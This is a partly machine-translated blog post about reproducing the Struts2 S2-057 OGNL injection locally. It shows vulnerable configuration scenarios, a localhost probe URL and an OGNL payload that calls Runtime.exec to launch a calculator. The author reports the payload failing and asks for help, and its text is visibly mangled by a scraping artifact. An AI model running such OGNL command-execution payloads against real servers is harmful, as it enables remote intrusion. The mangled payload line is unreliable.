S2-057 Local reproduction

Others 2020-04-21 08:49:29 views: null 
下午正不慌不忙测着我的安卓应用呢,突然爆了个Struts2漏洞,心里咯噔一下,不会吧,上个月工作汇报还在吹水Struts2在升级OGNL后,很难由于不正当OGNL解析造成任意命令执行了。原文见:

https://blog.csdn.net/u013224189/article/details/81091874
怀着不安的心情,看了下漏洞信息,踏马的,还真是这个地方。Struts2 7月份升级的2.3系列的版本,就是封堵了namespace,8月份又发布了2.5最新版本,还是封堵这个地方,总的来说就是避免在没有正确配置的情况下,直接从URI获取namespace的值,并传入程序作为OGNL表达式解析。
由于自己是个小白,所以始终构造不出攻击场景,这次发现漏洞的作者直接在博客里面更新了漏洞细节

https://semmle.com/news/apache-struts-CVE-2018-11776
https://lgtm.com/blog/apache_struts_CVE-2018-11776
根据作者的描述,在以下两种情况下Struts2应用可能存在漏洞

1)当Struts2 的命名空间没有为基础xml配置中定义的结果设置值时,可能造成RCE,同时,其上部操作配置没有通配符namespace。

2)当使用url没有value和action设置的标签并且同时其上部动作配置没有或通配符时,命名空间的条件跟第一种情况相同。
满足下面的场景就可能被利用

场景一:
<struts>
  <package ....>
    <action name="a1">   //此处没有配置namespace,或namespace为通配符,如/*
      <result type="redirectAction">  //result type类型为redirectiAction
        <param name="actionName">a2.action</param>
      </result>
    </action>
  </package>
</struts>

场景二:
<s:url includeParams="get">
  <s:param name="id" value="%{'22'}" />
</s:url>

In response to the above situation, a great god has announced the POC

https://github.com/jas502n/St2-057/blob/master/README.md

Any command execution. Thinking of my work report a month ago, my face was crackled.
Look at the POC constructed by the author,

First, use $ {(100 + 100)} to
visit http: // localhost: 8888 / struts2-showcase / $ {(100 + 100)} / actionChain1.action, the OGNL expression is successfully executed,

http://localhost:8888/struts2-showcase/200/register2.action

But when I perform the following POC, I never get my lovely calculator

${(#_memberAccess["allowStaticMethodAccess"]=true,#a[email protected].Runtime@getRuntime().exec('calc').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new  java.io.BufferedReader(#b),#d=new char[51020],#c.read(#d),#jas502n= @org.apache.struts2.ServletActionContext@getResponse().getWriter(),#jas502n.println(#d ),#jas502n.close())}

Much like the POC of S2-032, the author also said so.
I got a local test, but I still can't eject the calculator.
Prompt when debugging:
ognl.OgnlException: Eval expression / chained expressions have been disabled

Which great god can pass to answer?

dogs
Published 30 original articles · Like 13 · Visits 100,000+
Private letter concerns

Guess you like

Origin blog.csdn.net/u013224189/article/details/81980518
Recommended
Ranking
SpringBoot Learning (Five) - springboot rapid integration Druid
map / reduce + lambda allow simplification program
Zookeeper distributed reliable coordination system
How to use GPU to run tensorflow 2.12 on Windows WSL
Use numpy to generate random multidimensional matrices and perform dimension conversion
169. Tower of Hanoi
Basic attribute mapping
About JS traversing ul li
C++ extern “C“
PIM (on)
Daily
More
2024-06-12(0)
2024-06-11(0)
2024-06-10(0)
2024-06-09(0)
2024-06-08(0)
2024-06-07(0)
2024-06-06(0)
2024-06-05(0)
2024-06-04(0)
2024-06-03(1)

Code World

© 2018 codetd.com